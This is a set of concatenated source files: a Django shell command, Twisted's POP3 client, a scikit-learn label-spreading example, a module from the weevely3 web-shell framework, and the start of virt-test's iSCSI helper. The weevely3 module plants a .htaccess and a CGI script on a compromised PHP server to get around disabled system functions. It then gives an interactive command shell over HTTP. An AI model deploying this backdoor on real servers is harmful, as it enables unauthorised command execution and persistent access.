    help = "Runs a Python interactive interpreter. Tries to use IPython, if it's available."
    requires_model_validation = False
    def handle_noargs(self, **options):
        """
        Start an interactive interpreter: IPython when it is importable and
        --plain was not given, otherwise the stdlib ``code`` REPL.
        """
        # XXX: (Temporary) workaround for ticket #1796: force early loading of all
        # models from installed apps.
        from django.db.models.loading import get_models
        # The return value is unused; the call is made for its side effect
        # of importing every installed app's models.
        loaded_models = get_models()
        use_plain = options.get('plain', False)
        try:
            if use_plain:
                # Don't bother loading IPython, because the user wants plain Python.
                raise ImportError
            import IPython
            # Explicitly pass an empty list as arguments, because otherwise IPython
            # would use sys.argv from this script.
            shell = IPython.Shell.IPShell(argv=[])
            shell.mainloop()
        except ImportError:
            import code
            # Set up a dictionary to serve as the environment for the shell, so
            # that tab completion works on objects that are imported at runtime.
            # See ticket 5082.
            imported_objects = {}
            try: # Try activating rlcompleter, because it's handy.
                import readline
            except ImportError:
                pass
            else:
                # We don't have to wrap the following import in a 'try', because
                # we already know 'readline' was imported successfully.
                import rlcompleter
                readline.set_completer(rlcompleter.Completer(imported_objects).complete)
                readline.parse_and_bind("tab:complete")
            # We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
            # conventions and get $PYTHONSTARTUP first then import user.
            if not use_plain:
                pythonrc = os.environ.get("PYTHONSTARTUP")
                if pythonrc and os.path.isfile(pythonrc):
                    try:
                        # Python 2 only: execute the startup file in the
                        # current namespace.
                        execfile(pythonrc)
                    except NameError:
                        pass
                # This will import .pythonrc.py as a side-effect
                import user
            code.interact(local=imported_objects)
|
ojengwa/oh-mainline | refs/heads/master | vendor/packages/twisted/twisted/mail/pop3client.py | 28 | # -*- test-case-name: twisted.mail.test.test_pop3client -*-
# Copyright (c) 2001-2004 Divmod Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
POP3 client protocol implementation
Don't use this module directly. Use twisted.mail.pop3 instead.
@author: Jp Calderone
"""
import re
from twisted.python import log
from twisted.python.hashlib import md5
from twisted.internet import defer
from twisted.protocols import basic
from twisted.protocols import policies
from twisted.internet import error
from twisted.internet import interfaces
# Leading status indicators of POP3 server responses: success and failure.
OK = '+OK'
ERR = '-ERR'
class POP3ClientError(Exception):
    """
    The root of the exception hierarchy raised by L{POP3Client}.
    """
class InsecureAuthenticationDisallowed(POP3ClientError):
    """
    Raised when secure authentication was required but no acceptable
    mechanism could be found.
    """
class TLSError(POP3ClientError):
    """
    Raised when secure authentication was required but either the transport
    does not support TLS or no TLS context factory was supplied.
    """
class TLSNotSupportedError(POP3ClientError):
    """
    Raised when secure authentication was required but the server does not
    support TLS.
    """
class ServerErrorResponse(POP3ClientError):
    """
    The server answered a request with an error response.

    @ivar consumer: For failed long (multi-line) commands, the consumer
        that was in use when the failure occurred; otherwise C{None}.
    """
    def __init__(self, reason, consumer=None):
        self.consumer = consumer
        POP3ClientError.__init__(self, reason)
class LineTooLong(POP3ClientError):
    """
    Raised when the server sends an extremely long line.
    """
class _ListSetter:
# Internal helper. POP3 responses sometimes occur in the
# form of a list of lines containing two pieces of data,
# a message index and a value of some sort. When a message
# is deleted, it is omitted from these responses. The
# setitem method of this class is meant to be called with
# these two values. In the cases where indexes are skipped,
# it takes care of padding out the missing values with None.
def __init__(self, L):
self.L = L
def setitem(self, (item, value)):
diff = item - len(self.L) + 1
if diff > 0:
self.L.extend([None] * diff)
self.L[item] = value
def _statXform(line):
# Parse a STAT response
numMsgs, totalSize = line.split(None, 1)
return int(numMsgs), int(totalSize)
def _listXform(line):
# Parse a LIST response
index, size = line.split(None, 1)
return int(index) - 1, int(size)
def _uidXform(line):
# Parse a UIDL response
index, uid = line.split(None, 1)
return int(index) - 1, uid
def _codeStatusSplit(line):
# Parse an +OK or -ERR response
parts = line.split(' ', 1)
if len(parts) == 1:
return parts[0], ''
return parts
def _dotUnquoter(line):
"""
C{'.'} characters which begin a line of a message are doubled to avoid
confusing with the terminating C{'.\\r\\n'} sequence. This function
unquotes them.
"""
if line.startswith('..'):
return line[1:]
return line
class POP3Client(basic.LineOnlyReceiver, policies.TimeoutMixin):
    """POP3 client protocol implementation class
    Instances of this class provide a convenient, efficient API for
    retrieving and deleting messages from a POP3 server.
    @type startedTLS: C{bool}
    @ivar startedTLS: Whether TLS has been negotiated successfully.
    @type allowInsecureLogin: C{bool}
    @ivar allowInsecureLogin: Indicate whether login() should be
    allowed if the server offers no authentication challenge and if
    our transport does not offer any protection via encryption.
    @type serverChallenge: C{str} or C{None}
    @ivar serverChallenge: Challenge received from the server
    @type timeout: C{int}
    @ivar timeout: Number of seconds to wait before timing out a
    connection. If the number is <= 0, no timeout checking will be
    performed.
    """
    startedTLS = False
    allowInsecureLogin = False
    timeout = 0
    serverChallenge = None
    # Capabilities are not allowed to change during the session
    # (except when TLS is negotiated), so cache the first response and
    # use that for all later lookups
    _capCache = None
    # Regular expression to search for in the challenge string in the server
    # greeting line.
    _challengeMagicRe = re.compile('(<[^>]+>)')
    # List of pending calls.
    # We are a pipelining API but don't actually
    # support pipelining on the network yet.
    _blockedQueue = None
    # The Deferred to which the very next result will go.
    _waiting = None
    # Whether we dropped the connection because of a timeout
    _timedOut = False
    # If the server sends an initial -ERR, this is the message it sent
    # with it.
    _greetingError = None
    def _blocked(self, f, *a):
        # Internal helper. If commands are being blocked, append
        # the given command and arguments to a list and return a Deferred
        # that will be chained with the return value of the function
        # when it eventually runs. Otherwise, set up for commands to be
        # blocked and return None.
        if self._blockedQueue is not None:
            d = defer.Deferred()
            self._blockedQueue.append((d, f, a))
            return d
        self._blockedQueue = []
        return None
    def _unblock(self):
        # Internal helper. Indicate that a function has completed.
        # If there are blocked commands, run the next one. If there
        # are not, set up for the next command to not be blocked.
        if self._blockedQueue == []:
            self._blockedQueue = None
        elif self._blockedQueue is not None:
            _blockedQueue = self._blockedQueue
            self._blockedQueue = None
            d, f, a = _blockedQueue.pop(0)
            d2 = f(*a)
            d2.chainDeferred(d)
            # f is a function which uses _blocked (otherwise it wouldn't
            # have gotten into the blocked queue), which means it will have
            # re-set _blockedQueue to an empty list, so we can put the rest
            # of the blocked queue back into it now.
            self._blockedQueue.extend(_blockedQueue)
    def sendShort(self, cmd, args):
        # Internal helper. Send a command to which a short response
        # is expected. Return a Deferred that fires when the response
        # is received. Block all further commands from being sent until
        # the response is received. Transition the state to SHORT.
        d = self._blocked(self.sendShort, cmd, args)
        if d is not None:
            return d
        if args:
            self.sendLine(cmd + ' ' + args)
        else:
            self.sendLine(cmd)
        self.state = 'SHORT'
        self._waiting = defer.Deferred()
        return self._waiting
    def sendLong(self, cmd, args, consumer, xform):
        # Internal helper. Send a command to which a multiline
        # response is expected. Return a Deferred that fires when
        # the entire response is received. Block all further commands
        # from being sent until the entire response is received.
        # Transition the state to LONG_INITIAL.
        d = self._blocked(self.sendLong, cmd, args, consumer, xform)
        if d is not None:
            return d
        if args:
            self.sendLine(cmd + ' ' + args)
        else:
            self.sendLine(cmd)
        self.state = 'LONG_INITIAL'
        self._xform = xform
        self._consumer = consumer
        self._waiting = defer.Deferred()
        return self._waiting
    # Twisted protocol callback
    def connectionMade(self):
        # Start the idle timer (if configured) and block commands until the
        # server greeting arrives.
        if self.timeout > 0:
            self.setTimeout(self.timeout)
        self.state = 'WELCOME'
        self._blockedQueue = []
    def timeoutConnection(self):
        # Record that the drop was timeout-induced so connectionLost can
        # report a TimeoutError instead of the generic reason.
        self._timedOut = True
        self.transport.loseConnection()
    def connectionLost(self, reason):
        # Fail every outstanding and queued Deferred with the most specific
        # reason available (timeout, greeting error, or the given reason).
        if self.timeout > 0:
            self.setTimeout(None)
        if self._timedOut:
            reason = error.TimeoutError()
        elif self._greetingError:
            reason = ServerErrorResponse(self._greetingError)
        d = []
        if self._waiting is not None:
            d.append(self._waiting)
            self._waiting = None
        if self._blockedQueue is not None:
            d.extend([deferred for (deferred, f, a) in self._blockedQueue])
            self._blockedQueue = None
        for w in d:
            w.errback(reason)
    def lineReceived(self, line):
        # Dispatch the line to the state_<STATE> handler; the handler may
        # return the next state, or set self.state itself during the call.
        if self.timeout > 0:
            self.resetTimeout()
        state = self.state
        self.state = None
        state = getattr(self, 'state_' + state)(line) or state
        if self.state is None:
            self.state = state
    def lineLengthExceeded(self, buffer):
        # XXX - We need to be smarter about this
        if self._waiting is not None:
            waiting, self._waiting = self._waiting, None
            waiting.errback(LineTooLong())
        self.transport.loseConnection()
    # POP3 Client state logic - don't touch this.
    def state_WELCOME(self, line):
        # WELCOME is the first state. The server sends one line of text
        # greeting us, possibly with an APOP challenge. Transition the
        # state to WAITING.
        code, status = _codeStatusSplit(line)
        if code != OK:
            self._greetingError = status
            self.transport.loseConnection()
        else:
            m = self._challengeMagicRe.search(status)
            if m is not None:
                self.serverChallenge = m.group(1)
            self.serverGreeting(status)
        self._unblock()
        return 'WAITING'
    def state_WAITING(self, line):
        # The server isn't supposed to send us anything in this state.
        log.msg("Illegal line from server: " + repr(line))
    def state_SHORT(self, line):
        # This is the state we are in when waiting for a single
        # line response. Parse it and fire the appropriate callback
        # or errback. Transition the state back to WAITING.
        deferred, self._waiting = self._waiting, None
        self._unblock()
        code, status = _codeStatusSplit(line)
        if code == OK:
            deferred.callback(status)
        else:
            deferred.errback(ServerErrorResponse(status))
        return 'WAITING'
    def state_LONG_INITIAL(self, line):
        # This is the state we are in when waiting for the first
        # line of a long response. Parse it and transition the
        # state to LONG if it is an okay response; if it is an
        # error response, fire an errback, clean up the things
        # waiting for a long response, and transition the state
        # to WAITING.
        code, status = _codeStatusSplit(line)
        if code == OK:
            return 'LONG'
        consumer = self._consumer
        deferred = self._waiting
        self._consumer = self._waiting = self._xform = None
        self._unblock()
        deferred.errback(ServerErrorResponse(status, consumer))
        return 'WAITING'
    def state_LONG(self, line):
        # This is the state for each line of a long response.
        # If it is the last line, finish things, fire the
        # Deferred, and transition the state to WAITING.
        # Otherwise, pass the line to the consumer.
        if line == '.':
            consumer = self._consumer
            deferred = self._waiting
            self._consumer = self._waiting = self._xform = None
            self._unblock()
            deferred.callback(consumer)
            return 'WAITING'
        else:
            if self._xform is not None:
                self._consumer(self._xform(line))
            else:
                self._consumer(line)
            return 'LONG'
    # Callbacks - override these
    def serverGreeting(self, greeting):
        """Called when the server has sent us a greeting.
        @type greeting: C{str} or C{None}
        @param greeting: The status message sent with the server
        greeting. For servers implementing APOP authentication, this
        will be a challenge string. .
        """
    # External API - call these (most of 'em anyway)
    def startTLS(self, contextFactory=None):
        """
        Initiates a 'STLS' request and negotiates the TLS / SSL
        Handshake.
        @type contextFactory: C{ssl.ClientContextFactory} @param
        contextFactory: The context factory with which to negotiate
        TLS. If C{None}, try to create a new one.
        @return: A Deferred which fires when the transport has been
        secured according to the given contextFactory, or which fails
        if the transport cannot be secured.
        """
        tls = interfaces.ITLSTransport(self.transport, None)
        if tls is None:
            return defer.fail(TLSError(
                "POP3Client transport does not implement "
                "interfaces.ITLSTransport"))
        if contextFactory is None:
            contextFactory = self._getContextFactory()
        if contextFactory is None:
            return defer.fail(TLSError(
                "POP3Client requires a TLS context to "
                "initiate the STLS handshake"))
        d = self.capabilities()
        d.addCallback(self._startTLS, contextFactory, tls)
        return d
    def _startTLS(self, caps, contextFactory, tls):
        # Second step: verify the server advertises STLS, then issue it.
        assert not self.startedTLS, "Client and Server are currently communicating via TLS"
        if 'STLS' not in caps:
            return defer.fail(TLSNotSupportedError(
                "Server does not support secure communication "
                "via TLS / SSL"))
        d = self.sendShort('STLS', None)
        d.addCallback(self._startedTLS, contextFactory, tls)
        d.addCallback(lambda _: self.capabilities())
        return d
    def _startedTLS(self, result, context, tls):
        # Final step: wrap the transport and invalidate the capability
        # cache, since capabilities may change after TLS negotiation.
        self.transport = tls
        self.transport.startTLS(context)
        self._capCache = None
        self.startedTLS = True
        return result
    def _getContextFactory(self):
        # Build a default client TLS context, or None if pyOpenSSL-backed
        # twisted.internet.ssl is unavailable.
        try:
            from twisted.internet import ssl
        except ImportError:
            return None
        else:
            context = ssl.ClientContextFactory()
            context.method = ssl.SSL.TLSv1_METHOD
            return context
    def login(self, username, password):
        """Log into the server.
        If APOP is available it will be used. Otherwise, if TLS is
        available an 'STLS' session will be started and plaintext
        login will proceed. Otherwise, if the instance attribute
        allowInsecureLogin is set to True, insecure plaintext login
        will proceed. Otherwise, InsecureAuthenticationDisallowed
        will be raised (asynchronously).
        @param username: The username with which to log in.
        @param password: The password with which to log in.
        @rtype: C{Deferred}
        @return: A deferred which fires when login has
        completed.
        """
        d = self.capabilities()
        d.addCallback(self._login, username, password)
        return d
    def _login(self, caps, username, password):
        # Choose the most secure login path available: APOP, then STLS +
        # plaintext, then (if explicitly allowed) insecure plaintext.
        if self.serverChallenge is not None:
            return self._apop(username, password, self.serverChallenge)
        tryTLS = 'STLS' in caps
        #If our transport supports switching to TLS, we might want to try to switch to TLS.
        tlsableTransport = interfaces.ITLSTransport(self.transport, None) is not None
        # If our transport is not already using TLS, we might want to try to switch to TLS.
        nontlsTransport = interfaces.ISSLTransport(self.transport, None) is None
        if not self.startedTLS and tryTLS and tlsableTransport and nontlsTransport:
            d = self.startTLS()
            d.addCallback(self._loginTLS, username, password)
            return d
        elif self.startedTLS or not nontlsTransport or self.allowInsecureLogin:
            return self._plaintext(username, password)
        else:
            return defer.fail(InsecureAuthenticationDisallowed())
    def _loginTLS(self, res, username, password):
        # TLS is up; plaintext credentials are now protected by the channel.
        return self._plaintext(username, password)
    def _plaintext(self, username, password):
        # Internal helper. Send a username/password pair, returning a Deferred
        # that fires when both have succeeded or fails when the server rejects
        # either.
        return self.user(username).addCallback(lambda r: self.password(password))
    def _apop(self, username, password, challenge):
        # Internal helper. Computes and sends an APOP response. Returns
        # a Deferred that fires when the server responds to the response.
        # The digest is the MD5 hex digest of challenge + password.
        digest = md5(challenge + password).hexdigest()
        return self.apop(username, digest)
    def apop(self, username, digest):
        """Perform APOP login.
        This should be used in special circumstances only, when it is
        known that the server supports APOP authentication, and APOP
        authentication is absolutely required. For the common case,
        use L{login} instead.
        @param username: The username with which to log in.
        @param digest: The challenge response to authenticate with.
        """
        return self.sendShort('APOP', username + ' ' + digest)
    def user(self, username):
        """Send the user command.
        This performs the first half of plaintext login. Unless this
        is absolutely required, use the L{login} method instead.
        @param username: The username with which to log in.
        """
        return self.sendShort('USER', username)
    def password(self, password):
        """Send the password command.
        This performs the second half of plaintext login. Unless this
        is absolutely required, use the L{login} method instead.
        @param password: The plaintext password with which to authenticate.
        """
        return self.sendShort('PASS', password)
    def delete(self, index):
        """Delete a message from the server.
        @type index: C{int}
        @param index: The index of the message to delete.
        This is 0-based.
        @rtype: C{Deferred}
        @return: A deferred which fires when the delete command
        is successful, or fails if the server returns an error.
        """
        # POP3 message numbers on the wire are 1-based.
        return self.sendShort('DELE', str(index + 1))
    def _consumeOrSetItem(self, cmd, args, consumer, xform):
        # Internal helper. Send a long command. If no consumer is
        # provided, create a consumer that puts results into a list
        # and return a Deferred that fires with that list when it
        # is complete.
        if consumer is None:
            L = []
            consumer = _ListSetter(L).setitem
            return self.sendLong(cmd, args, consumer, xform).addCallback(lambda r: L)
        return self.sendLong(cmd, args, consumer, xform)
    def _consumeOrAppend(self, cmd, args, consumer, xform):
        # Internal helper. Send a long command. If no consumer is
        # provided, create a consumer that appends results to a list
        # and return a Deferred that fires with that list when it is
        # complete.
        if consumer is None:
            L = []
            consumer = L.append
            return self.sendLong(cmd, args, consumer, xform).addCallback(lambda r: L)
        return self.sendLong(cmd, args, consumer, xform)
    def capabilities(self, useCache=True):
        """Retrieve the capabilities supported by this server.
        Not all servers support this command. If the server does not
        support this, it is treated as though it returned a successful
        response listing no capabilities. At some future time, this may be
        changed to instead seek out information about a server's
        capabilities in some other fashion (only if it proves useful to do
        so, and only if there are servers still in use which do not support
        CAPA but which do support POP3 extensions that are useful).
        @type useCache: C{bool}
        @param useCache: If set, and if capabilities have been
        retrieved previously, just return the previously retrieved
        results.
        @return: A Deferred which fires with a C{dict} mapping C{str}
        to C{None} or C{list}s of C{str}. For example::
        C: CAPA
        S: +OK Capability list follows
        S: TOP
        S: USER
        S: SASL CRAM-MD5 KERBEROS_V4
        S: RESP-CODES
        S: LOGIN-DELAY 900
        S: PIPELINING
        S: EXPIRE 60
        S: UIDL
        S: IMPLEMENTATION Shlemazle-Plotz-v302
        S: .
        will be lead to a result of::
        | {'TOP': None,
        | 'USER': None,
        | 'SASL': ['CRAM-MD5', 'KERBEROS_V4'],
        | 'RESP-CODES': None,
        | 'LOGIN-DELAY': ['900'],
        | 'PIPELINING': None,
        | 'EXPIRE': ['60'],
        | 'UIDL': None,
        | 'IMPLEMENTATION': ['Shlemazle-Plotz-v302']}
        """
        if useCache and self._capCache is not None:
            return defer.succeed(self._capCache)
        cache = {}
        def consume(line):
            # A capability name alone maps to None; extra words become a list.
            tmp = line.split()
            if len(tmp) == 1:
                cache[tmp[0]] = None
            elif len(tmp) > 1:
                cache[tmp[0]] = tmp[1:]
        def capaNotSupported(err):
            # Servers without CAPA answer -ERR; treat that as "no capabilities".
            err.trap(ServerErrorResponse)
            return None
        def gotCapabilities(result):
            self._capCache = cache
            return cache
        d = self._consumeOrAppend('CAPA', None, consume, None)
        d.addErrback(capaNotSupported).addCallback(gotCapabilities)
        return d
    def noop(self):
        """Do nothing, with the help of the server.
        No operation is performed. The returned Deferred fires when
        the server responds.
        """
        return self.sendShort("NOOP", None)
    def reset(self):
        """Remove the deleted flag from any messages which have it.
        The returned Deferred fires when the server responds.
        """
        return self.sendShort("RSET", None)
    def retrieve(self, index, consumer=None, lines=None):
        """Retrieve a message from the server.
        If L{consumer} is not None, it will be called with
        each line of the message as it is received. Otherwise,
        the returned Deferred will be fired with a list of all
        the lines when the message has been completely received.
        """
        # When ``lines`` is given, only the headers plus that many body
        # lines are fetched, using TOP instead of RETR.
        idx = str(index + 1)
        if lines is None:
            return self._consumeOrAppend('RETR', idx, consumer, _dotUnquoter)
        return self._consumeOrAppend('TOP', '%s %d' % (idx, lines), consumer, _dotUnquoter)
    def stat(self):
        """Get information about the size of this mailbox.
        The returned Deferred will be fired with a tuple containing
        the number or messages in the mailbox and the size (in bytes)
        of the mailbox.
        """
        return self.sendShort('STAT', None).addCallback(_statXform)
    def listSize(self, consumer=None):
        """Retrieve a list of the size of all messages on the server.
        If L{consumer} is not None, it will be called with two-tuples
        of message index number and message size as they are received.
        Otherwise, a Deferred which will fire with a list of B{only}
        message sizes will be returned. For messages which have been
        deleted, None will be used in place of the message size.
        """
        return self._consumeOrSetItem('LIST', None, consumer, _listXform)
    def listUID(self, consumer=None):
        """Retrieve a list of the UIDs of all messages on the server.
        If L{consumer} is not None, it will be called with two-tuples
        of message index number and message UID as they are received.
        Otherwise, a Deferred which will fire with of list of B{only}
        message UIDs will be returned. For messages which have been
        deleted, None will be used in place of the message UID.
        """
        return self._consumeOrSetItem('UIDL', None, consumer, _uidXform)
    def quit(self):
        """Disconnect from the server.
        """
        return self.sendShort('QUIT', None)
# Names exported by ``from twisted.mail.pop3client import *``.
__all__ = [
    # Exceptions
    'InsecureAuthenticationDisallowed', 'LineTooLong', 'POP3ClientError',
    'ServerErrorResponse', 'TLSError', 'TLSNotSupportedError',
    # Protocol classes
    'POP3Client']
|
ndingwall/scikit-learn | refs/heads/master | examples/semi_supervised/plot_label_propagation_digits.py | 22 | """
===================================================
Label Propagation digits: Demonstrating performance
===================================================
This example demonstrates the power of semisupervised learning by
training a Label Spreading model to classify handwritten digits
with sets of very few labels.
The handwritten digit dataset has 1797 total points. The model will
be trained using all points, but only 40 will be labeled. Results
in the form of a confusion matrix and a series of metrics over each
class will be very good.
At the end, the top 10 most uncertain predictions will be shown.
"""
print(__doc__)
# Authors: Clay Woolam <clay@woolam.org>
# License: BSD
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn import datasets
from sklearn.semi_supervised import LabelSpreading
from sklearn.metrics import confusion_matrix, classification_report
digits = datasets.load_digits()
# Fixed seed so the subsample (and therefore the output) is reproducible.
rng = np.random.RandomState(2)
indices = np.arange(len(digits.data))
rng.shuffle(indices)
# Work with a random subsample of 340 digits.
X = digits.data[indices[:340]]
y = digits.target[indices[:340]]
images = digits.images[indices[:340]]
n_total_samples = len(y)
n_labeled_points = 40
# Note: `indices` is rebound here; everything past the first
# n_labeled_points positions is treated as unlabeled.
indices = np.arange(n_total_samples)
unlabeled_set = indices[n_labeled_points:]
# #############################################################################
# Mask the labels of every point outside the labeled subset (-1 marks a
# point as unlabeled for the semi-supervised estimator)
y_train = np.copy(y)
y_train[unlabeled_set] = -1
# #############################################################################
# Learn with LabelSpreading
lp_model = LabelSpreading(gamma=.25, max_iter=20)
lp_model.fit(X, y_train)
predicted_labels = lp_model.transduction_[unlabeled_set]
true_labels = y[unlabeled_set]
cm = confusion_matrix(true_labels, predicted_labels, labels=lp_model.classes_)
print("Label Spreading model: %d labeled & %d unlabeled points (%d total)" %
      (n_labeled_points, n_total_samples - n_labeled_points, n_total_samples))
print(classification_report(true_labels, predicted_labels))
print("Confusion matrix")
print(cm)
# #############################################################################
# Calculate uncertainty values for each transduced distribution
pred_entropies = stats.distributions.entropy(lp_model.label_distributions_.T)
# #############################################################################
# Pick the top 10 most uncertain labels
uncertainty_index = np.argsort(pred_entropies)[-10:]
# #############################################################################
# Plot the ten most uncertain digits with predicted vs. true labels
f = plt.figure(figsize=(7, 5))
for index, image_index in enumerate(uncertainty_index):
    image = images[image_index]
    sub = f.add_subplot(2, 5, index + 1)
    sub.imshow(image, cmap=plt.cm.gray_r)
    plt.xticks([])
    plt.yticks([])
    sub.set_title('predict: %i\ntrue: %i' % (
        lp_model.transduction_[image_index], y[image_index]))
f.suptitle('Learning with small amount of labeled data')
plt.show()
|
epinaa/weevely3 | refs/heads/master | modules/audit/disablefunctionbypass.py | 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module, Status
from core.loggers import log
from core import modules
from core import messages
from utils import strings
from utils import http
import string
import os
class Disablefunctionbypass(Module):
    """ Bypassing system-like disable_function with mod_cgi and .htaccess"""
    def init(self):
        # Framework hook: declare module metadata, CLI arguments and the
        # PHP/upload vectors used later by _install() and run().
        self.register_info(
            {
                'author': [
                    'Emilio Pinna',
                    # mod_cgi + .htaccess bypassing technique by ASDIZZLE
                    # https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/
                    'ASDIZZLE' ],
                'license': 'GPLv3'
            }
        )
        self.register_arguments([
          { 'name' : 'rpath', 'help' : 'Remote path. If it is a folder find the first writable folder in it', 'default' : '.', 'nargs' : '?' },
          { 'name' : '-script', 'help' : 'CGI script to upload', 'default' : os.path.join(self.folder, 'cgi.sh') },
          { 'name' : '-just-run', 'help' : 'Skip install and run shell through URL' },
        ])
        self.register_vectors( [
            # Detect whether Apache has mod_cgi loaded (prerequisite).
            PhpCode(
                """(is_callable('apache_get_modules')&&in_array('mod_cgi', apache_get_modules())&&print(1))||print(0);""",
                postprocess = lambda x: True if x == '1' else False,
                name = 'mod_cgi'
            ),
            # Upload a .htaccess enabling CGI execution for a random extension.
            ModuleExec(
                'file_upload2web',
                [ '/bogus/.htaccess', '-content', 'Options +ExecCGI\nAddHandler cgi-script .${extension}' ],
                name = 'install_htaccess'
            ),
            ModuleExec(
                'file_upload',
                [ '${script}', '${rpath}' ],
                name = 'install_script'
            ),
            # Make the uploaded CGI script executable.
            PhpCode(
                """(is_callable('chmod')&&chmod('${rpath}', 0777)&&print(1))||print(0);""",
                postprocess = lambda x: True if x == '1' else False,
                name = 'chmod'
            ),
            ModuleExec(
                'file_rm',
                [ '${path}' ],
                name = 'remove'
            ),
        ])
    def _clean(self, htaccess_absolute_path, script_absolute_path):
        """Remove the uploaded .htaccess and CGI script from the target."""
        log.warning('Deleting %s and %s' % (htaccess_absolute_path, script_absolute_path))
        self.vectors.get_result('remove', format_args = { 'path': htaccess_absolute_path })
        self.vectors.get_result('remove', format_args = { 'path': script_absolute_path })
    def _install(self):
        """Upload .htaccess + CGI script, chmod it, and verify it executes.

        Returns the script URL on success, None otherwise (after cleaning
        up any partially-installed files).
        """
        if not self.vectors.get_result('mod_cgi'):
            log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)
            return
        # Random script name and extension, to avoid collisions/signatures.
        filename = strings.randstr(5, charset = string.ascii_lowercase)
        ext = strings.randstr(3, charset = string.ascii_lowercase)
        result_install_htaccess = self.vectors.get_result(
            'install_htaccess',
            format_args = { 'extension': ext }
        )
        # install_htaccess returns (absolute_path, url) on success.
        if (
            not result_install_htaccess or
            not result_install_htaccess[0][0] or
            not result_install_htaccess[0][1]
        ):
            log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess)
            return
        htaccess_absolute_path = result_install_htaccess[0][0]
        # Derive the script path/URL from the .htaccess location.
        script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace('.htaccess',filename), ext)
        script_url = '%s.%s' % (
            result_install_htaccess[0][1].replace('.htaccess',filename),
            ext
        )
        result_install_script = self.vectors.get_result(
            'install_script',
            format_args = { 'script' : self.args.get('script'), 'rpath': script_absolute_path }
        )
        if not result_install_script:
            log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return
        result_chmod = self.vectors.get_result(
            'chmod',
            format_args = { 'rpath': script_absolute_path }
        )
        if not result_chmod:
            log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return
        if not self._check_response(script_url):
            log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
            self._clean(htaccess_absolute_path, script_absolute_path)
            return
        log.warning(messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path))
        log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url))
        return script_url
    def _check_response(self, script_url):
        """Probe the CGI backdoor with an echo of a random marker string."""
        script_query = '%s?c=' % (script_url)
        query_random_str = strings.randstr(5)
        command_query = '%secho%%20%s' % (script_query, query_random_str)
        result_request = http.request(command_query)
        return query_random_str in result_request
    def run(self):
        """Ensure the CGI backdoor is in place, then loop on user commands,
        executing each through the CGI script via plain HTTP requests."""
        # Terminate if shell_sh is active
        if self.session['shell_sh']['status'] == Status.RUN:
            log.warning(messages.module_audit_disablefunctionbypass.error_sh_commands_enabled)
            return
        # Install if -just-run option hasn't been provided, else directly check the backdoor
        script_url = self.args.get('just_run')
        if not script_url:
            script_url = self._install()
            if not script_url:
                return
        elif not self._check_response(script_url):
            log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
            return
        log.warning(messages.module_audit_disablefunctionbypass.requests_not_obfuscated)
        # Console loop
        while True:
            query = raw_input('CGI shell replacement $ ').strip()
            if not query:
                continue
            if query == 'quit':
                break
            log.info(http.request('%s?c=%s' % (script_url, query)))
|
rbian/virt-test | refs/heads/master | virttest/iscsi.py | 1 | """
Basic iscsi support for Linux host with the help of commands
iscsiadm and tgtadm.
This include the basic operates such as login and get device name by
target name. And it can support the real iscsi access and emulated
iscsi in localhost then access it.
"""
import re
import os
import logging
from autotest.client import os_dep
from autotest.client.shared import utils, error
from virttest import utils_selinux
def iscsi_get_sessions():
    """
    Get the iscsi sessions activated
    """
    output = utils.system_output("iscsiadm --mode session",
                                 ignore_status=True)
    if "No active sessions" in output:
        return []
    # Each session line looks like: "tcp: [1] 10.0.0.1:3260,1 iqn....".
    sessions = []
    for line in output.splitlines():
        fields = line.split()
        sessions.append((fields[2].split(',')[0], fields[3]))
    return sessions
def iscsi_get_nodes():
    """
    Get the iscsi nodes
    """
    output = utils.system_output("iscsiadm --mode node")
    if "No records found" in output:
        return []
    # Capture (portal address, target name) pairs from each record line.
    pattern = r"(\d+\.\d+\.\d+\.\d+|\W:{2}\d\W):\d+,\d+\s+([\w\.\-:\d]+)"
    return re.findall(pattern, output)
def iscsi_login(target_name, portal):
    """
    Login to a target with the target name

    :param target_name: Name of the target
    :params portal: Hostname/Ip for iscsi server
    """
    login_cmd = ("iscsiadm --mode node --login --targetname %s"
                 " --portal %s" % (target_name, portal))
    output = utils.system_output(login_cmd)
    # iscsiadm reports "Login ... successful" on success.
    return target_name if "successful" in output else ""
def iscsi_logout(target_name=None):
    """
    Logout from a target. If the target name is not set then logout all
    targets.

    :params target_name: Name of the target.
    """
    if target_name:
        logout_cmd = "iscsiadm --mode node --logout -T %s" % target_name
    else:
        logout_cmd = "iscsiadm --mode node --logout all"
    output = utils.system_output(logout_cmd)
    # On success, echo back the requested target name (None for "all").
    if "successful" in output:
        return target_name
    return ""
def iscsi_discover(portal_ip):
    """
    Query from iscsi server for available targets

    :param portal_ip: Ip for iscsi server
    """
    output = utils.system_output(
        "iscsiadm -m discovery -t sendtargets -p %s" % portal_ip,
        ignore_status=True)
    # "Invalid ..." in the output means discovery failed; return "".
    if "Invalid" in output:
        logging.debug(output)
        return ""
    return output
class Iscsi(object):
    """
    Basic iscsi support class. Will handle the emulated iscsi export and
    access to both real iscsi and emulated iscsi device.
    """
    def __init__(self, params, root_dir="/tmp"):
        """
        :param params: dict-like object; recognized keys are "target",
                       "portal_ip", "initiator", "iscsi_thread_id",
                       "emulated_image", "image_size", "chap_user" and
                       "chap_passwd".
        :param root_dir: Directory where the emulated image file is stored.
        """
        os_dep.command("iscsiadm")
        self.target = params.get("target")
        self.export_flag = False
        # Always define emulated_image so code paths shared with real
        # (non-emulated) devices, e.g. login(), can test it safely instead
        # of raising AttributeError when no emulated image is configured.
        self.emulated_image = None
        if params.get("portal_ip"):
            self.portal_ip = params.get("portal_ip")
